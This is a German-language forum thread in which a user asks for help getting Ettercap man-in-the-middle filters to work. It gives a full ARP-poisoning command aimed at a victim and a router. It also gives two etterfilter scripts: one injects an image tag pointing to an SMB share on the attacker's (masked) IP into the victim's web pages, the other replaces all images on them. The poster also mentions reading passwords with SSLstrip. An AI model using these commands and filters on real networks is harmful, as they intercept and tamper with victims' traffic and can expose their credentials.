Results 1 to 4 of 4

Thread: Ettercap und Filter

Hybrid View

  1. #1
    Junior Member
    Join Date
    Mar 2009
    Posts
    77

    Default Ettercap und Filter

    Hey Leute,
    ich hab mal n bissi mit ettercap rumgespielt und hab vor einiger Zeit auch mal nen "Erfolg" gehabt in hinsicht auf, dass ich einen Filter gefunden hab, der auf einer Homepage die das Opfer aufruft alle Bilder auswechselt.

    So nun hab ich heute hier im Forum rumgestöbert und bin dabei auf folgendes Video gestoßen:
    http://forums.remote-exploit.org/pen...-backdoor.html

    Nun wollte ich das mal ausprobieren und hab mir den Filter besorgt, compiliert und ihn mit ettercap gestartet...
    Aber nichts passiert.
    Ettercap benutzt die Filter iwie nicht mehr.
    Egal ob ich den alten oder den neuen Filter probiere, es passiert garnichts.
    Ettercap selbst läuft, denn mit SSLstrip kann ich immernoch die Kennwörter auslesen...
    Nur die Filter gehen iwie nicht.
    Jemand ne Idee oder nen Lösungsansatz?
    ich ruf ettercap wie folgt auf:
    Code:
    ettercap -i eth0 -f smb.ef - Tq -M arp /IP-Victim/ /IP-Router/
    Der Filter sieht wie folgt aus:

    Code:
    if (ip.proto == TCP && tcp.dst == 80) {
       if (search(DATA.data, "Accept-Encoding")) {
          replace("Accept-Encoding", "Accept-Rubbish!");
              # note: replacement string is same length as original string
          msg("zapped Accept-Encoding!\n");
       }
    }
    
    if (ip.proto == TCP && tcp.src == 80) {
       replace("</body>", "<img src=\"\\\\XXX.XXX.X.XX\\image.jpg\"></body>");
       replace("</Body>", "<IMG SRC=\"\\\\XXX.XXX.X.XX\\image.jpg\"></body>");
       msg("Filter Ran.\n");
    }
    der andere (zum Bilderersetzen) sieht so aus:
    Code:
    if (ip.proto == TCP && tcp.dst == 80) {
       if (search(DATA.data, "Accept-Encoding")) {
          replace("Accept-Encoding", "Accept-Rubbish!"); 
    	  # note: replacement string is same length as original string
          msg("zapped Accept-Encoding!\n");
       }
    }
    if (ip.proto == TCP && tcp.src == 80) {
       replace("img src=", "img src=\"http://www.irongeek.com/images/jollypwn.png\" ");
       replace("IMG SRC=", "img src=\"http://www.irongeek.com/images/jollypwn.png\" ");
       msg("Filter Ran.\n");
    }

    Aber mal abgesehen davon, dass ein Fehler in den Filtern sein könnte, müsste ettercap doch wenigstens "Filter Ran" schreiben sobald es was zum Replacen findet...
    tut es aber nicht!

    Soviel erstmal von mir...

    Ach so noch ne Frage zum ersten Filter...
    Sollte ich ettercap nun irgendwann dazu bewegen diesen Filter auszuführen, muss das Bild auf meinem Rechner tatsächlich vorhanden sein oder reicht es bei dem Angriff, dass das Opfer versucht auf meinen Rechner zuzugreifen??

    Gruß hardez

  2. #2

    Default

    hey hardez, ja ich hatte das gleiche problem, habs auch im video gesehen, aber infos gibts ja leider keine....
    hälts mich auf dem laufenden
    www.myownremote.blogspot.com

  3. #3
    Junior Member
    Join Date
    Mar 2009
    Posts
    77

    Default

    ja ich habs inzwischen hinbekommen, sogar mit einem sehr guten Ergebnis.
    Hab im Netz viel dazu gefunden aber iwie war alles sehr langsam.
    Hab dann n bissi rumgespielt und iwann was gefunden, was das ganze extrem beschleunigt hat.
    Weiß aber grade nicht was es war.
    Ich hab das Script wie es am Ende aussah aber noch auf meinem Laborrechner auf der Arbeit.
    Kann ich dann morgen mal nach schauen!

  4. #4
    Junior Member
    Join Date
    Mar 2009
    Posts
    77

    Default

    Ach so genau, dass Problem waren glaub ich die Anführungszeichen!
    Hab leider den Filter nicht mehr um nachzuschauen!

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •